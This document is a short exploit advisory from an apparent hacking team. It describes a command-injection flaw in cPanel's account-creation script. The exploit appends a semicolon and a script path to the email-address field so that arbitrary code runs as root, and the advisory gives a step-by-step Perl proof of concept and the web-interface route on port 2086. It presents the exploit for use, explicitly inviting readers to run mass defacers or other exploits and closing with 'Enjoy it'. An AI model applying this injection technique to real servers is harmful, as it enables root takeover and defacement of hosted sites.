cpanel-root.txt

`By : Ali Jasbi ( IHST security & hacking Research team) WwW.Hackerz.ir  
Vendor : Cpanel.net  
Version : ALL !!  
Risk : Very high  
What u can do with this bug is :  
u can have a access to all the server with reseller privilege (Th3 r00t)  
how it's work ?  
when u want to create an account in shell what will happen ?  
./script/wwwact [domainname] [username] [password] [Email address] lab lab lab  
that u can run it with a web base program ! ( cpanel : doamin:2086)  
example :  
http://domain:2086/scripts/wwwacct [domainname] [username] [password] [Email address] lab lab lab  
it means you got a access to wwwacct in the scripts folder (Th3 r00t)  
so u can run other command with root access like that  
./scripts/wwwactt domain.com domain password [email protected];./home/hackerz/public_html/do.pl ( your command now is ./home/hackerz/public_html/do.pl)  
that u can Likewise run it on the web base program.what u need to do is just write [email protected];./home/hackerz/public_html/do.pl in Email text box when u want to create an account.  
()()()()()()()()()()()()()  
Test it:  
++++++++++++++++++++++++++  
Step 1  
  
Save this file in /home/user/public_html/do.pl .  
#!/usr/bin/perl  
$old='/home/user/public_html/test.txt';  
$new='/home/root/kon.txt';  
rename $old, $new;  
++++++++++++++++++++++++++  
step 2   
  
make a text file named test.txt in your public_html directory.  
path will be : /home/user/public_html/test.txt .  
++++++++++++++++++++++++++  
step 3  
  
create an account and write [email protected];./home/user/public_html/do.pl in E-mail Address text box  
then click on the "create" button.  
Yes , you can find your file in /home/root/ .  
++++++++++++++++++++++++++  
()()()()()()()()()()()()()  
you can run your own code !(mass defacer, exploit's or everything that u want).  
Enjoy it...  
`